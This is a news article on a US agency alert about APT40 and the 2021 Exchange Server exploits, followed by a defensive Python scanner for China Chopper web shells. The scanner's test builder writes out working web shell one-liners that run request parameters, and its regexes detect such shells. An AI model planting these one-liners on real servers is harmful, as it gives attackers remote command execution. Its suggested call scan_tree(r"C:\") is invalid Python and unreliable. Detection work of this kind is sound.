The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have observed “sophisticated Chinese state-sponsored activity” targeting multiple public and private sectors in the United States.
According to CISA, the Chinese Advanced Persistent Threat (APT) group, tracked as APT40, is targeting U.S. political, economic, military, educational, and critical infrastructure personnel and their organizations.
“On July 19, 2021, the U.S. Department of Justice (DOJ) unsealed an indictment against four APT40 cyber actors for their illicit computer network exploitation (CNE) activities via front company Hainan Xiandun Technology Development Company (Hainan Xiandun). Hainan Xiandun employee Wu Shurong cooperated with and carried out orders from PRC Ministry of State Security (MSS) Hainan State Security Department (HSSD) intelligence officers Ding Xiaoyang, Zhu Yunmin, and Cheng Qingmin to conduct CNE,” CISA wrote in the alert.
“Wu’s CNE activities resulted in the theft of trade secrets, intellectual property, and other high-value information from companies and organizations in the United States and abroad, as well as from multiple foreign governments.”
According to the U.S. Department of Justice (DOJ) press release, Wu Shurong was a computer hacker who (as part of his job duties at Hainan Xiandun) “created malware, hacked into computer systems operated by foreign governments, companies and universities, and supervised other Hainan Xiandun hackers.”
CISA, FBI and NSA also released the following useful links and guidelines related to the threat:
- Microsoft Exchange server exploitation activity
- Joint Cybersecurity Advisory: Chinese Observed TTPs
- CISA Insights: Chinese Cyber Threat Overview for Leaders
- Safeguarding Critical Infrastructure against Threats from the People’s Republic of China
- China Cyber Threat Overview and Advisories
Readers may recall that earlier this year malicious actors exploited four Exchange Server zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) to compromise thousands of Exchange servers around the globe.
The following month, the DOJ announced a court-authorized FBI operation to remove malicious web shells from hundreds of compromised and vulnerable Microsoft Exchange servers. Patching the four vulnerabilities does not remove a web shell that was planted before the patch was applied, which is why the removal effort mattered for servers that were already compromised.
CISA also published reports on the DearCry ransomware and the China Chopper web shell tied to the Exchange Server exploits. Attackers were using this malware to deepen their foothold on compromised on-premises Microsoft Exchange servers and to launch further attacks.
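The web shells and the China Chopper report mentioned above are something a defender can hunt for on their own servers rather than waiting for a takedown. The following is an added example written for this page, not code from CISA, the FBI, or the linked reports: a small Python scanner that walks an Exchange webroot (or a copy of it taken for forensics) and flags server-side script files carrying a China Chopper-style `eval(Request...)` one-liner. It rates hits higher when they sit in directories that public ProxyLogon write-ups named as common drop locations; those directory names, the signatures, and the sample webroot it builds are assumptions constructed for this example, not something the page lists.

```python
"""Hunt for China Chopper-style web shells in an Exchange webroot (or a copy of it).

Added example for this page; signatures, directory names and the sample
webroot are constructed assumptions, not taken from CISA's report.
"""
import re
import tempfile
from pathlib import Path

# Server-side script extensions IIS will execute; an attacker only needs one.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php"}

# Signatures. The first is the classic China Chopper ASPX one-liner (JScript
# eval of a request parameter with the "unsafe" flag); the others catch common
# ASP/ASPX variants. Constructed for this example, not a vendor feed.
WEBSHELL_SIGNATURES = {
    "china_chopper_aspx": re.compile(
        r"""eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*["']unsafe["']\s*\)""", re.I),
    "china_chopper_asp": re.compile(
        r"""\b(?:eval|execute)\s*\(\s*request\s*\(""", re.I),
    "runat_server_eval": re.compile(
        r"""runat\s*=\s*["']server["'].*?\b(?:eval|execute)\s*\(""", re.I | re.S),
}

# Directory fragments (matched against the lower-cased path relative to the scan
# root) where ProxyLogon actors were widely reported to drop shells. Assumed here
# from public advisories; used only to raise severity, never to limit the scan.
HIGH_RISK_DIRS = (
    "inetpub/wwwroot/aspnet_client",
    "frontend/httpproxy/owa/auth",
    "frontend/httpproxy/ecp/auth",
)


def classify_file(path) -> list:
    """Return the names of signatures matching this file (empty list if clean)."""
    try:
        text = Path(path).read_text(encoding="utf-8", errors="ignore")
    except OSError:
        return []
    return [name for name, rx in WEBSHELL_SIGNATURES.items() if rx.search(text)]


def scan_tree(root) -> list:
    """Walk `root` and report every script file that trips at least one signature."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTENSIONS:
            continue
        hits = classify_file(path)
        if not hits:
            continue
        rel = path.relative_to(root).as_posix()
        in_hot_dir = any(d in rel.lower() for d in HIGH_RISK_DIRS)
        findings.append({
            "path": rel,
            "signatures": hits,
            "severity": "high" if in_hot_dir else "medium",
        })
    return findings


def build_sample_webroot() -> str:
    """Create a constructed webroot: one benign page, two planted shells, one decoy."""
    root = Path(tempfile.mkdtemp(prefix="exchange_hunt_"))
    owa_auth = root / "Program Files/Microsoft/Exchange Server/V15/FrontEnd/HttpProxy/owa/auth"
    aspnet = root / "inetpub/wwwroot/aspnet_client"
    misc = root / "inetpub/wwwroot/misc"
    for d in (owa_auth, aspnet, misc):
        d.mkdir(parents=True)
    # Benign page: references Request but never evaluates it.
    (owa_auth / "logon.aspx").write_text(
        '<%@ Page Language="C#" %>\n<html><body><%= Request.Url.Host %></body></html>\n')
    # Constructed China Chopper ASPX one-liner in a known drop directory.
    (owa_auth / "help.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>\n')
    # Constructed classic-ASP variant outside any known drop directory.
    (misc / "error.asp").write_text('<%execute(request("cmd"))%>\n')
    # Non-script file containing the string: must not be reported.
    (aspnet / "notes.txt").write_text('eval(Request.Item["x"],"unsafe")\n')
    return str(root)


if __name__ == "__main__":
    for f in scan_tree(build_sample_webroot()):
        print(f"[{f['severity']}] {f['path']}: {', '.join(f['signatures'])}")
```

Run it against a live webroot with `scan_tree(r"C:\")` or against a mounted image. Treat every hit as a lead rather than a verdict: compare the file's timestamps with the patch date, check it against a clean Exchange install, and remember that a shell can be rewritten to dodge any string signature, so the directory and timestamp context is as important as the regex.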
- FBI removes malicious web shells from hundreds of compromised Microsoft Exchange servers
- CISA publishes reports on DearCry ransomware and China Chopper Web Shell malware linked to Exchange Server exploits (update-2)
- Cybersecurity experts warn exploits grow ten-fold after Exchange Server zero-day vulnerabilities revealed
- FBI and CISA issue urgent joint cybersecurity advisory on Exchange server hacks
- Microsoft releases emergency patches for Exchange Server RCE vulnerabilities exploited in the wild (Updated)